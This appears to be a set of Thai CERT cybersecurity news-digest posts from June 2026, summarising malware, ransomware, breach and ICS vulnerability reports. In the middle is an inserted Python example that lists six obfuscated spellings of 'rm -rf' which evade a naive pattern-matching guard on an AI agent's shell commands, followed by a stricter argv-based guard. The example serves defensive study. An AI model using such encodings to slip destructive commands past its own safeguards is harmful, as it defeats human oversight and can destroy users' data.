        https://securelist.com/toddycat-apt-umbrij-tool-and-oauth/120251/
      • RustDuck: An In-Depth Analysis Of a Two-Stage Botnet
        "Since February 2026, the XLAB large-scale network threat perception system has detected a new malware family active in cyberspace that adopts a Loader + Core (two-stage loading) architecture. Currently, the family has spawned multiple variants, with the main core functionality being the execution of large-scale Distributed Denial-of-Service (DDoS) attacks. It also possesses strong cross-platform adaptability and continuous evolution capabilities."
        https://blog.xlab.qianxin.com/rustduck-en/
        https://thehackernews.com/2026/06/rustduck-botnet-rebuilds-in-rust-to.html
      • Silent Swap: A Crypto Clipper Extension Campaign
        "McAfee Advanced Threat Research has identified an active browser-extension campaign designed to steal cryptocurrency by silently substituting wallet addresses the moment a user initiates a transaction. The campaign is delivered through unsigned installers — observed in both .NET and Golang variants — that deploy a malicious Chromium extension masquerading as a benign “Google Notes” utility."
        https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-clipper-wallet-swapping-browser-extension-malware/
        https://thehackernews.com/2026/06/silent-swap-crypto-clipper-uses-fake.html
      • INC Ransomware Targets Mainframes: Exposed Servers Reveal Cross-Platform Payloads And APAC Campaign
        "A recent infrastructure exposure provided a rare look into an active INC ransomware affiliate targeting the Asia-Pacific region. In mid-June 2026, a pair of open directories were identified on AEZA Group LLC, a known bulletproof hosting environment, revealing an operational staging server. The exposed directories contained Windows and Linux encryptors, Group Policy Object (GPO) deployment scripts for a Japanese food and beverage company, and 675 MB of operator tooling, and exfiltrated victim data. Together, these findings offered a unique view into an active ransomware campaign in near real-time."
        https://cyberandramen.net/2026/06/24/inc-ransomware-targets-mainframes-exposed-servers-reveal-cross-platform-payloads-and-apac-campaign/

      Breaches/Hacks/Leaks

      • Insurance Giant Aflac Discloses Data Breach After Subsidiary Hack
        "American insurance giant Aflac has disclosed a new data breach after attackers breached its Japan subsidiary's systems and stole personal and bank account information. Aflac (short for American Family Life Assurance Company) is a Fortune 500 company and the largest supplemental insurance provider in the United States, serving millions of customers in the U.S. and Japan. In a filing with the U.S. Securities and Exchange Commission (SEC) on Monday, the company revealed that threat actors gained access to Aflac Japan's systems earlier this month."
        https://www.bleepingcomputer.com/news/security/insurance-giant-aflac-discloses-data-breach-after-subsidiary-hack/
        https://www.securityweek.com/aflac-japan-data-breach-impacts-4-38-million/
        https://securityaffairs.com/194488/data-breach/hackers-steal-data-of-4-38-million-aflac-japan-customers.html

      General News

      • Shadow AI Is Not a Tool Problem. It’s a Timing Problem.
        "Most AI policies are written in the future tense. Employees use AI in the present tense. That gap explains a lot about shadow AI. A governance committee may still be defining good AI use. Meanwhile, AI has already become part of how work moves: in the browser, inside SaaS platforms, and across everyday applications. The mismatch is not only organizational. It is temporal."
        https://blog.checkpoint.com/ai-security/shadow-ai-is-not-a-tool-problem-its-a-timing-problem/
      • Vulnerability Reports Are Arriving Faster Than GitHub Can Review Them
        "Across the open source world, people are reporting software flaws in record numbers, and the systems built to verify those reports are straining under the weight. The GitHub Advisory Database, which feeds automated security alerts to millions of projects, has reached a point where some new advisories take weeks to publish. In May 2026, the database published 1,560 reviewed advisories, the most in its history and several times its usual monthly output. The volume still fell short of what arrived."
        https://www.helpnetsecurity.com/2026/06/30/github-advisory-database-review/
      • Half The Defense Base Still Builds Security Around Compliance
        "CMMC requirements are appearing in defense contracts and moving down through supplier networks to thousands of companies new to this kind of compliance work. Many run on limited budgets with lean security teams. The picture comes from nearly 900 defense contractors, C3PAOs, federal suppliers, and cybersecurity professionals who attended the 2026 Secureframe National Cybersecurity Summit."
        https://www.helpnetsecurity.com/2026/06/30/federal-cybersecurity-compliance-report/
      • Over 300 UK Firms Hit By Ransomware In a Year
        "UK organizations suffered more than 26 successful ransomware attacks each month last year, with SMEs hit hardest, according to new data from Report Fraud. The UK’s cybercrime and fraud reporting service was contacted by 323 corporate ransomware victims between April 2025 and March 2026, according to City of London Police. Over 50% of reports were from small and mid-sized companies. Financial losses associated with these incidents increased 50% annually to around £270,000 ($357,000), although the police force admitted this was likely an underestimate given many businesses do not fully disclose the figure."
        https://www.infosecurity-magazine.com/news/over-300-uk-firms-hit-ransomware/
      • What’s The Difference Between Credential Theft And Session Hijacking?
        "Credential theft targets login details: Attackers steal usernames and passwords to access accounts, often through phishing or social engineering. Session hijacking targets active access: Attackers steal or manipulate session tokens to impersonate users who have already logged in. Multifactor authentication (MFA) helps, but it isn’t foolproof: Session hijacking can bypass MFA because the attacker is exploiting an already-authenticated session. Stopping these attacks requires layered defenses: Strong authentication, encryption, session monitoring, device checks, and user training all play a role."
        https://blog.barracuda.com/2026/06/29/credential-theft-vs-session-hijacking
      • UK Healthcare Sector Records Tenfold Increase In Cyber-Attacks
        "The UK’s healthcare sector is being “stress-tested to breaking point," with a tenfold increase in attacks during January-May 2026 compared to the whole of 2025, according to SonicWall. The security vendor’s data comes from its intrusion prevention system (IPS) sensors dispersed across UK healthcare clients. They recorded 264,000 individual events in the first five months of the year compared to just 27,000 for 2025."
        https://www.infosecurity-magazine.com/news/uk-healthcare-tenfold-increase/
      • Accelerating The Quantum-Safe Timeline
        "For years, planning for post-quantum cryptography (PQC) was framed as a future problem: important, inevitable, but distant. That perspective is evolving as technology advances and organizations prepare for the scale and complexity of the transition ahead. At Microsoft, we are acting on this shift by bringing our quantum-safe timeline forward so organizations can begin the transition earlier and with greater confidence."
        https://www.microsoft.com/en-us/security/blog/2026/06/30/microsoft-advances-quantum-safe-security-as-the-risk-timeline-shifts/
        https://www.bleepingcomputer.com/news/microsoft/microsoft-accelerates-quantum-safe-roadmap-as-risks-grow/
      • Communications Security Establishment Canada Annual Report 2025-2026
        "For 80 years, the Communications Security Establishment Canada (CSE) has used its expertise in signals intelligence to keep Canada and Canadians safe. As technology has evolved, so has CSE’s role. Through our Canadian Centre for Cyber Security (Cyber Centre), we now provide authoritative, practical advice and technical guidance to help Canadian individuals, businesses, various levels of government and critical infrastructure stay safe from cyber threats. Together, we are Canada’s digital frontline of defence."
        https://www.cse-cst.gc.ca/en/accountability/transparency/reports/communications-security-establishment-canada-annual-report-2025-2026
        https://www.bankinfosecurity.com/russian-water-system-hack-attempted-to-turn-canada-dry-a-32122
      • AI-Generated Workflows Are a Silent Security Disaster
        "A security analyst at a large enterprise recently found sensitive HR documents being copied into a Microsoft Teams channel that hundreds of employees could access. It was not caused by a malicious insider, a compromised admin account, or a sophisticated attacker. It was caused by a Power Automate workflow. The workflow had been created by a developer who wanted to automate document approvals between SharePoint and Teams. To move faster, the developer used an AI assistant to generate the automation logic. Functionally, the workflow worked. Documents moved from one location to another. Notifications were sent. The approval process became faster."
        https://www.darkreading.com/cyber-risk/ai-generated-workflows-silent-security-disaster
      • Two Months In: Assessing The Impact Of NIST's Enrichment Cutbacks
        "On April 15, NIST announced that it would no longer attempt enrichment for every CVE. Vulnerabilities are still ingested by the National Vulnerability Database, but enrichment is now reserved for a selected subset. Everything else will be marked as Not Scheduled. That may sound strategic, but is actually problematic. For years, NIST established itself as an authoritative source of vulnerability data. Teams have come to rely on their assessment of CVSS, CWE, and CPE for vulnerability management and automation."
        https://blog.volerion.com/posts/two-months-in-nist-cuts-back-on-enrichment-efforts/
        https://www.darkreading.com/vulnerabilities-threats/nist-enrichment-reductions-cve-coverage-accuracy
      • Singapore Cyber Landscape 2025/2026
        "The cybersecurity landscape over the past year was defined by several prominent trends, underpinned by a threat environment of growing complexity, speed, scale, and sophistication. Key among the drivers of these trends were the proliferation and accessibility of artificial intelligence, as well as the interdependencies inherent in modern supply chains. In line with global trends, Singapore’s cyber landscape saw an increase in ransomware attacks. Locally, there was also a notable rise in the number of infected systems, driven primarily by an expanded attack surface stemming from the increasing adoption of Malware-as-a-Service (MaaS) operations, and the proliferation of consumer-grade Internet-of-Things (IoT) devices with unpatched firmware or default passwords."
        https://www.csa.gov.sg/resources/publications/singapore-cyber-landscape-2025-2026/
      • What's Trending: Top Cyber Attacker Techniques, March - May 2026
        "Between March 1 and May 31, 2026 (“the reporting period”), attackers achieved their objectives by exploiting trusted identities, devices, and tools rather than malicious code. Because their activity resembled normal behavior, traditional perimeter and file-scanning defenses often failed to catch it. Adversaries leaned on two strategies: social engineering at scale and attacks on unpatched, internet-facing infrastructure. The leading technique “ClickFix” drove the first, shifting delivery from compromised websites to emailed links, while “Qilin,” the period’s most active ransomware operator, continued exploiting unpatched edge devices for mass extortion. What’s more, AI is making social engineering faster, cheaper, and more convincing, accelerating familiar techniques rather than creating new ones."
        https://reliaquest.com/blog/threat-spotlight-whats-trending-top-cyber-attacker-techniques-march-may-2026
        https://www.infosecurity-magazine.com/news/clickfix-cybercriminals-favorite/
      • Securing AI Agents: When AI Tools Move From Reading To Acting
        "As enterprise deployments mature, some enterprise AI agents are shifting from reading content to taking action. In this post, Microsoft Incident Response walks through an attack pattern that targets the fastest growing part of the agentic AI supply chain: Model Context Protocol (MCP) tools. The post provides a practical playbook for detecting, containing, and preventing this class of attack using Microsoft security controls."
        https://www.microsoft.com/en-us/security/blog/2026/06/30/securing-ai-agents-ai-tools-move-from-reading-acting/
        https://thehackernews.com/2026/06/microsoft-warns-poisoned-mcp-tool.html
      • What The Numbers Say About FIFA 2026 Cyber Risk
        "The FIFA World Cup 2026 opened on June 11. By that date, according to Check Point Research, the fraud infrastructure targeting it had already been built, staged, and partially deployed. Threat actor activity was pre-planned, months out, across three sectors and at least ten languages. Check Point Exposure Management published the FIFA World Cup 2026 Cyber Threat Report this month, covering financial services, transportation, hospitality, and gambling. Here are three findings worth reading carefully."
        https://thehackernews.com/2026/06/what-numbers-say-about-fifa-2026-cyber.html
        https://checkpoint.cyberint.com/fifa-report-2026
      • Hacker Conversations: Chris Thompson, Former Head Of IBM X-Force Red, Co-Founder Of RemoteThreat
        "From bad game hacker to an elite good red team hacker. Chris Thompson is a hacker. His journey took him from hacking game controls as a teenager to become the founder of IBM’s first dedicated red team and then global head of X-Force Red. In 2024 he founded and remains the organizer of Offensive AI Con, and in 2025 moved from IBM to be co-founder and CEO at RemoteThreat."
        https://www.securityweek.com/hacker-conversations-chris-thompson-former-head-of-ibm-x-force-red-co-founder-of-remotethreat/
      • The AI Token Costs That Can Break Cybersecurity
        "Imagine this scenario. It’s Tuesday night at 11:47 PM. Your senior SOC analyst is pulled into a critical, high-severity alert. A primary Domain Controller has flagged a deeply anomalous administrative command sequence originating from a mid-level employee’s standard workstation. The analyst triggers “agents” on the organization’s cybersecurity platform to assist with her investigation: mapping the account’s full authentication timeline, cross-referencing internal network logs, scanning active threat intelligence feeds, constructing secondary lookup queries to hunt for lateral movement. The investigation is moving at machine speed."
        https://www.securityweek.com/the-ai-token-costs-that-can-break-cybersecurity/
      • XSS Forum: From DaMaGeLaB To The 2025 Takedown
        "XSS[.]is, the most influential Russian-language cybercrime forum of the past decade and the direct heir to the legacy board DaMaGeLaB, lost its administrator on 22 July 2025 when French and Ukrainian police arrested a 38-year-old man in Kyiv. Europol, which coordinated Operation Ratatouille, said the forum had more than 50,000 members and that the suspect earned over EUR 7 million arbitrating deals between criminals. The Ransomnews Research Team analysed a leaked copy of the forum database, 123,241 messages across 51 trading sections, to show exactly how the marketplace worked and where it sat in the ransomware kill chain."
        https://ransomnews.com/xss-forum-damagelab-takedown-2025/
        https://securityaffairs.com/194524/security/xss-is-the-forum-that-ran-the-ransomware-supply-chain-is-down-the-market-isnt.html

      References

      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
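Added example for the GuardFall item in the digest above (not code from the Adversa post, from hermes-agent, or from any agent it surveys). It puts a guard that pattern-matches the raw command string against `rm -rf` beside one that decides on the argv a POSIX shell would actually build from that string. The bypass strings are constructed for this example; `naive_guard`, `argv_guard` and the `/tmp/x` target are names chosen here.

```python
import re
import shlex

# Constructed for this example: each string makes bash execute `rm -rf /tmp/x`,
# yet none of them contains the literal text "rm -rf" that a pattern guard
# looks for. /tmp/x is a placeholder target.
BYPASSES = [
    "r''m -rf /tmp/x",            # empty quotes split the command word
    'rm -r""f /tmp/x',            # empty quotes split the flag
    "rm $'-rf' /tmp/x",           # ANSI-C quoting: bash rewrites $'-rf' to -rf
    '"rm" -rf /tmp/x',            # quoted command word
    "rm${IFS}-rf${IFS}/tmp/x",    # $IFS expands to whitespace, then word-splits
    "rm -r -f /tmp/x",            # same argv effect, different flag spelling
]

DANGEROUS = re.compile(r"\brm\s+-rf\b")


def naive_guard(cmd: str) -> bool:
    """Pattern-on-raw-text guard of the kind the article describes.
    Returns True to block. It inspects the string, not what bash runs."""
    return DANGEROUS.search(cmd) is not None


_SEPARATORS = set("();<>|&")         # shlex's default punctuation_chars
_UNRESOLVABLE = re.compile(r"[$`]")  # expansions shlex cannot evaluate


def _simple_commands(cmd: str) -> list[list[str]]:
    """Split a command line into simple commands (argv lists) the way a
    POSIX shell tokenizes it: quotes are resolved, and ; && || | ( ) < >
    end the current command."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok and all(ch in _SEPARATORS for ch in tok):
            if current:
                commands.append(current)
                current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def _is_recursive_force_rm(argv: list[str]) -> bool:
    """True if this argv is rm with both recursive and force options,
    however the options are spelled or grouped."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "rm":
        return False
    flags: set[str] = set()
    for arg in argv[1:]:
        if arg == "--":
            break
        if arg.startswith("--"):
            flags.add(arg[2:])
        elif arg.startswith("-") and len(arg) > 1:
            flags.update(arg[1:])      # -rf, -fr, -Rf all land here
    return bool(flags & {"r", "R", "recursive"}) and bool(flags & {"f", "force"})


def argv_guard(cmd: str) -> bool:
    """Guard that decides on the argv a shell would build, not on raw text.
    Returns True to block. Fails closed on anything it cannot resolve."""
    # shlex implements POSIX sh quoting only: it knows nothing about
    # $'..', ${..}, $(..) or backticks, which bash rewrites before execution.
    # Text containing them cannot be judged from the string, so refuse it.
    if _UNRESOLVABLE.search(cmd):
        return True
    try:
        commands = _simple_commands(cmd)
    except ValueError:                 # unbalanced quotes: refuse rather than guess
        return True
    return any(_is_recursive_force_rm(argv) for argv in commands)


if __name__ == "__main__":
    for c in ["rm -rf /tmp/x", *BYPASSES]:
        print(f"{c!r:32} naive={naive_guard(c)!s:5} argv={argv_guard(c)}")
```

Run as-is, the naive guard lets all six bypasses through while the argv-based guard blocks every one of them. The hardened guard still only approximates bash, which is why it refuses anything containing `$` or a backtick instead of guessing; a text-level check of this kind is a last line of defence, not a substitute for running the agent with less than full account authority.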
    • CISA adds one exploited vulnerability to its catalog

      On 30 June 2026 (B.E. 2569) the Cybersecurity and Infrastructure Security Agency (CISA) added one new vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. Details:

      CVE-2026-48558 SimpleHelp Authentication Bypass Vulnerability

      CISA continuously updates the KEV catalog with newly exploited vulnerabilities so that it covers the risks actually observed now and in the future.

      References

      https://www.cisa.gov/news-events/alerts/2026/06/29/cisa-adds-one-known-exploited-vulnerability-catalog

      Follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT
    • CISA releases eight Industrial Control Systems (ICS) advisories

      On 30 June 2026 (B.E. 2569) the Cybersecurity and Infrastructure Security Agency (CISA) released eight advisories on industrial control systems (ICS) to provide timely information on security issues, vulnerabilities, and exploits affecting ICS. Details:

      ICSMA-26-181-01 OFFIS DCMTK Toolkit
      ICSA-26-181-01 Mitsubishi Electric MELSOFT Update Manager SW1DND-UDM-M
      ICSA-26-181-02 Frangoteam FUXA SCADA/HMI
      ICSA-26-181-03 Schneider Electric EcoStruxure IT Data Center Expert
      ICSA-26-181-04 Schneider Electric EasyLogic T150 and Saitel DP RTU
      ICSA-26-181-05 XZ Utils vulnerability impacting B&R Products
      ICSA-26-181-06 StoneFly Storage Concentrator
      ICSA-26-181-07 Delta Electronics DVP12SE PLC

      References

      https://www.cisa.gov/news-events/ics-advisories

      Posted in OT Cyber Security News
      NCSA_THAICERT
    • US seizes nearly 400 illegal World Cup streaming domains, warns users of malware and data-leak risks

      Follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT
    • KDDI discloses a data leak affecting up to 14.2 million email accounts at six Japanese internet service providers

      Follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT
    • OpenAI launches GPT-5.6 Sol, an advanced AI for cybersecurity focused on vulnerability detection and defensive tasks

      Follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT
    • ETDA Cyber Threat Intelligence 30 June 2026

      Healthcare Sector

      • Pydicom Pynetdicom Library
        "Successful exploitation of this vulnerability could allow an unauthenticated attacker to write to arbitrary file paths."
        https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-176-01
      • OHIF Viewers DICOM
        "Successful exploitation of this vulnerability in a custom integration version could allow an attacker to steal an authenticated clinician's token via a crafted link."
        https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-176-02

      Industrial Sector

      • EVoke Systems Charging Station Management System
        "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-02
      • Yokogawa FAST/TOOLS And CI Server
        "Successful exploitation of this vulnerability may return a response containing the CI Server setting information."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-01
      • Horner Automation Cscape
        "Successful exploitation of this vulnerability could allow a local attacker to disclose information and execute arbitrary code."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-03
      • Daktronics Controller Firmware
        "Successful exploitation of these vulnerabilities could could provide an unauthenticated user with complete root-level access and control of the system."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-04
      • H.VIEW HV-500S6 IP Camera
        "Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code and upload malicious files to the affected device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-05
      • Delta Electronics DTM Soft
        "Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-06
      • Schneider Electric PowerLogic P7
        "Schneider Electric is aware of a vulnerability in its PowerLogic™ P7 product. The PowerLogic™ P7 is a protection and control platform designed for complex and advanced electrical network applications. Failure to apply the remediation provided below may risk unauthorized execution of privileged commands or loss of HMI operability and configuration functionality, which could result in loss of control over system operations and disruption of critical services."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-07
      • Beware Of The License Manager: How a Schneider Electric Software Vulnerability Puts Industrial Facilities At Risk
        "The CVE-2024-2658 vulnerability was discovered in 2024 within the FlexNet Publisher component of the Schneider Electric Floating License Manager. This software handles license management across various Schneider Electric products used for comprehensive industrial automation ranging from PLC programming to centralized control room implementation. Below, we break down how a single flaw can jeopardize an entire industrial facility, how to detect it on your workstations, and how to minimize the risks. This vulnerability is a CWE-427: Uncontrolled Search Path Element issue. It stems from a system application referencing an OpenSSL configuration file at a hardcoded path without proper access controls."
        https://securelist.com/tr/schneider-electric-cve-2024-2658-vulnerability/120436/

      New Tooling

      • DarkMoon: Open-Source AI Pentesting Platform
        "Penetration testing has long run on expert time, with specialists spending days probing a network or web application by hand. Manual engagements stretch across weeks, expert consultants run into thousands of dollars a day, and results vary with the tester. Automation promises to narrow those gaps. A growing set of projects now hands the work to AI agents that plan and execute on their own. DarkMoon, an open-source platform, sits in that group. It runs a security assessment end to end and delivers an evidence-backed report at the finish."
        https://www.helpnetsecurity.com/2026/06/29/darkmoon-open-source-ai-pentesting-platform/
        https://github.com/ASCIT31/Dark-Moon

      Vulnerabilities

      • Public PoC Released For Critical Libssh2 CVE-2026-55200 Client-Side SSH Flaw
        "A public proof-of-concept is now out for CVE-2026-55200, a critical flaw in libssh2 that lets a malicious or compromised SSH server trigger memory corruption on a connecting client, with possible code execution. No credentials, no user interaction. The bug affects every release up to and including 1.11.1 and carries a CVSS 4.0 score of 9.2. libssh2 is a client-side SSH library, not a server. That distinction matters. It is embedded in curl, Git, PHP, backup agents, firmware updaters, and a long tail of appliances."
        https://thehackernews.com/2026/06/public-poc-released-for-critical.html
      • Hackers Now Exploit Critical Oracle E-Business Flaw In Attacks
        "Attackers have begun exploiting a critical vulnerability (tracked as CVE-2026-46817) in the Oracle E-Business Suite (EBS) financial application, according to threat intelligence company Defused. This security flaw was found in the File Transmission component of EBS's Oracle Payments product and enables unauthenticated malicious actors with HTTP network access to take over vulnerable systems through low-complexity attacks. Oracle released security updates to address the vulnerability with its May 2026 Critical Security Patch Update and urged customers to patch their systems immediately."
        https://www.bleepingcomputer.com/news/security/new-oracle-e-business-suite-flaw-now-exploited-in-attacks/
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2026-48558 SimpleHelp Authentication Bypass Vulnerability"
        https://www.cisa.gov/news-events/alerts/2026/06/29/cisa-adds-one-known-exploited-vulnerability-catalog

      Malware

      • Hijacked Npm Packages Use Novel VSCode Autorun And Blockchain Dead Drops To Deploy a Credential/Crypto Stealer
        "Following our report, Nextron Research identified an additional 16 Go packages containing the same malware. Most appear to be legitimate packages whose latest released version included the malware alongside the original package contents, using the same structure and fake font file. The full list is available in the Go packages identified containing the same malicious payload section below. Some of the malicious packages are still live, even years after their commit timestamp."
        https://research.jfrog.com/post/hijacked-npm-vscode-tasks-blockchain/
        https://thehackernews.com/2026/06/hijacked-npm-and-go-packages-use-vs.html
      • A Djinn In The Machine: TaskWeaver’s Node.js Intrusion Chain
        "Blackpoint’s Adversary Pursuit Group (APG) investigated and contained an intrusion that began with the exploitation of CVE-2026-48558, a critical authentication bypass vulnerability affecting the OpenID Connect authentication flow in SimpleHelp Remote Monitoring and Management (RMM) software. By exploiting this vulnerability, the threat actor obtained an authenticated technician session on an internet-facing SimpleHelp server without possessing valid credentials. Using this access, the threat actor deployed two previously undocumented malware samples, which the APG has named TaskWeaver and Djinn Stealer."
        https://blackpointcyber.com/blog/a-djinn-in-the-machine-taskweavers-node-js-intrusion-chain/
        https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-simplehelp-flaw-deploy-new-djinn-infostealer-taskweaver-malware/
        https://www.darkreading.com/cyberattacks-data-breaches/djinn-stealer-targets-cloud-ai-credentials
      • Threat Intelligence Report: Nation-State Targeting Of Water Systems 2024–2026
        "Water and wastewater systems have become favored gray-zone targets because they are highly vulnerable and hold disproportionate strategic value. The combination of chronic underinvestment and weak baseline operational technology (OT) security make many of these critical systems easy to compromise. Such intrusions can have both physical and psychological impact, and disruptions often affect civilian life, public health, and trust in government. Recent nation-state cyber activity targeting water systems includes Iranian IRGC-linked targeting of exposed programmable logic controllers (PLCs), Russian and pro-Russian access to municipal water-control environments, and PRC-linked pre-positioning in U.S. critical infrastructure, including water and wastewater systems."
        https://dti.domaintools.com/research/threat-intelligence-report-nation-state-targeting-of-water-systems-2024-2026
        https://www.darkreading.com/ics-ot-security/iran-russia-china-target-water-systems-sabotage
      • 212 Domains Reference Venezuela’s Earthquake, Most Within Two Days
        "A small, high‑confidence set of current domain registrations that clearly reference the Venezuela earthquake, likely a fraction of the wider registration activity the event has driven, profiled across creation dates, registrars, registrant emails, name servers and naming intent. A magnitude‑7.2 foreshock and magnitude‑7.5 mainshock struck north‑central Venezuela on 24 June 2026; 50% of these domains were filed on 25 June alone, the day after. Full data access is available to verified organizations through our research and media collaborations program."
        https://threat-news.whoisxmlapi.com/2026-venezuela-earthquake
        https://hackread.com/venezuela-earthquake-domains-donation-scam-warnings/
      • Microsoft Removes 119 Edge Extensions That Hid Malware In Images And Fonts
        "Microsoft has shut down a long-running malicious extension operation on the Edge Add-ons store that hid its payloads inside ordinary image and font files, then woke up days after install to steal credentials and run ad fraud. The company calls it StegoAd, a mash-up of steganography and adware, and ties 119 extensions to a single threat actor it says has been active since at least 2021. The extensions were the kind people install without a second thought: ad blockers, VPNs, translators, video downloaders. Each one did its job and earned reviews. The malicious code stayed dormant until the extension cleared a stack of evasion checks, which is how it sat in the store for years."
        https://thehackernews.com/2026/06/microsoft-removes-119-edge-extensions.html
        https://microsoftedge.github.io/edgevr/assets/files/stego_ad/Microsoft_Edge_Security_StegoAd.pdf
        https://www.malwarebytes.com/blog/news/2026/06/119-edge-extensions-promised-useful-tools-instead-downloaded-malware
        https://securityaffairs.com/194409/malware/stegoad-how-119-fake-browser-extensions-stole-credentials-and-ran-ad-fraud-for-two-years.html
      • The Gentlemen Are Knocking: Custom Backdoors And Evolving Tactics
        "This year saw the emergence of The Gentlemen, a prominent example of a group operating under the ransomware-as-a-service (RaaS) model. Although our initial assessment suggested the group first appeared in mid-2025, it actually started ramping up its activities at the beginning of 2026. According to public reports, in the first half of 2026, this group ranks among the top 10 ransomware actors by the number of victim announcements on its data leak site (DLS)."
        https://securelist.com/the-gentlemen-raas/120447/
      • Chromium Extension Uses AI‑related Branding To Redirect Browser Search
        "Microsoft Threat Intelligence has identified a malicious Chromium-based extension that spoofs the AI-powered answer engine Perplexity AI to trick unsuspecting users into installing it. Based on our observation of the extension’s behavior, we assess its primary objective to be search traffic interception and data collection, which might enable downstream use cases such as profiling, targeted advertising, or other forms of misuse depending on operator intent. Through responsible disclosure, we reported this extension to Google, and it has been taken down as of this writing. We’d like to thank Google for responding to and addressing this issue."
        https://www.microsoft.com/en-us/security/blog/2026/06/29/chromium-extension-uses-airelated-branding-redirect-browser-search/
        https://thehackernews.com/2026/06/malicious-perplexity-chrome-extension.html
      • Mustang Panda Targets India's Government And Energy Sectors With ZOHOMURK And MINIRECON
        "Acronis TRU has identified two espionage-focused campaigns targeting India's hydropower sector and government entities, using lure documents themed around cooperation agreements between Indian and Taiwanese institutions. Both campaigns delivered previously undocumented DLL-based loaders, which we track as SHARDLOADER, through hydropower- and government-themed lure documents distributed in compressed archives. Upon execution, one SHARDLOADER variant decrypts and launches MINIRECON, a newly identified implant derived from the Toneshell malware family, while the second variant deploys ZOHOMURK, a novel implant that leverages legitimate cloud services for command-and-control, data exfiltration and remote task execution."
        https://www.acronis.com/en/tru/posts/mustang-panda-targets-indias-government-and-energy-sectors/
        https://thehackernews.com/2026/06/mustang-panda-uses-zoho-workdrive-as.html
      • TONResolver RAT Abuses TON Blockchain To Target Japan's Hotel Industry
        "In late May 2026, suspicious emails were identified being sent to Japanese partner companies of Booking.com, with the subject line “Important: Guest Stay Review Request” (重要:ゲスト滞在レビュー依頼). In this attack, a zip file was downloaded by accessing a hyperlink to a suspicious web site, and the infection began when the user clicked a shortcut link file (LNK) disguised as a photo file within the zip archive. Unlike conventional phishing campaigns, the malware abuses The Open Network (TON) blockchain platform as a dead drop resolver, a technique that allows attackers to update their command-and-control (C&C) server destination without hardcoding it into the malware, making detection and takedown significantly more difficult."
        https://www.trendmicro.com/en_us/research/26/f/tonresolver.html
      • A Multi-Stage Steganographic Loader Campaign Deploying Diverse Payloads Globally
        "During the routine telemetry monitoring, we identified a detection on a suspicious file named “GST Debit Note Apr_26.com”, based on the telemetry data observed. This prompted us to investigate the sample further. Our analysis revealed that the payload was a variant of the Remcos RAT malware family, distributed via a phishing campaign as an archive attachment. One notable characteristic of this infection chain was its reliance on in-memory execution techniques / fileless malware & Steganography. By avoiding disk-based artifacts, the threat reduces forensic evidence and increases its ability to evade traditional security tools and signature-based detection methods."
        https://labs.k7computing.com/index.php/a-multi-stage-steganographic-loader-campaign-deploying-diverse-payloads-globally/

      Breaches/Hacks/Leaks

      • Nissan Discloses Employee Data Breach Linked To Oracle Zero-Day Attacks
        "Nissan is warning that it suffered a data breach affecting current and former employees after threat actors exploited an Oracle PeopleSoft vulnerability in data theft attacks previously linked to the ShinyHunters extortion group. In breach notifications filed with the California Attorney General's Office, Oracle says these data theft attacks impacted hundreds of companies and that Nissan was specifically targeted in the campaign. "Nissan Americas uses Oracle PeopleSoft software to manage employee information, including payroll, tax administration, and other personnel records," reads the breach notifications."
        https://www.bleepingcomputer.com/news/security/nissan-discloses-employee-data-breach-linked-to-oracle-zero-day-attacks/
      • NAIC Says Public Data Stolen In ShinyHunters' PeopleSoft Breach
        "The National Association of Insurance Commissioners (NAIC) says the ShinyHunters extortion group stole only publicly available data, outdated logs, and configuration files after breaching its systems by exploiting a zero-day vulnerability in an Oracle PeopleSoft server. NAIC is a U.S. insurance regulatory organization present in all 50 states. The organization identified on June 11 that its PeopleSoft system had been accessed by an unauthorized party and discovered that "an unauthorized third party gained access to a portion of our IT systems." ShinyHunters claimed the attack and leaked the stolen data after the organization refused to pay a ransom."
        https://www.bleepingcomputer.com/news/security/naic-says-public-data-stolen-in-shinyhunters-peoplesoft-breach/
        https://www.infosecurity-magazine.com/news/us-insurance-regulator-confirms/
        https://www.securityweek.com/insurance-regulators-group-naic-hit-in-oracle-peoplesoft-hack/
      • Russian Hackers Accused Of Destructive Cyber-Attack On Jaguar Land Rover
        "Security experts and practitioners have weighed in on a new report claiming that Russia was behind the Jaguar Land Rover (JLR) breach last year. The New York Times report cited people close to the investigation in its story on June 26 linking Russian hackers to the incident, which is estimated to have cost the British economy £1.9bn ($2.5bn). Microsoft, which was tracking the Russians, reportedly raised the alarm with JLR. However, while the report didn’t explicitly link the Putin regime with the attack, experts have been more forthright."
        https://www.infosecurity-magazine.com/news/russian-hackers-destructive-jaguar/

      General News

      • Sycophantic Chatbots And The Harms That Build Over Many Chats
